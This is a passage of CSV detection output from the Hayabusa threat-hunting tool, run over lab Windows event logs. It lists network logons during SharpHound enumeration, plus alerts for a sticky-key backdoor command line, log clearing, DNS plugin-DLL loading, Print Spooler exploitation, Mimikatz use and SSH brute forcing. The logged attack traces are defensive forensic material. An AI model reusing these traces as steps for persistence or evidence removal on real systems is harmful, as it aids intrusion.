0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62167 : LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62170 : LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62182 : LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62175 : LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: 
admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62178 : LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62179 : LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62180 : LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62184 : LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62168 : LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 
17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62172 : LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62183 : LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62187 : LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62186 : LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62189 : LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62193 : LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62192 : LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62191 : LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62195 : LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62196 : LogonID: 
0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62197 : LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62198 : LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62199 : LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62200 : LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - 
Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62211 : LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62209 : LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62219 : LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62222 : LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62223 : LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 
+2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62210 : LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62208 : LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62218 : LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62216 : LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62217 : LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62220 : LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62221 : LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62224 : LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62234 : LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62235 : LogonID: 
0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62236 : LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\windows\system32\cmd.exe sethc.exe 211 : Path: C:\Windows\System32\cmd.exe : User: OFFSEC\admmig : Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the 
ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL 
serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_5848 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848 : Workstation: - : IP Address: - : Port: - : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848 : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,- +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target 
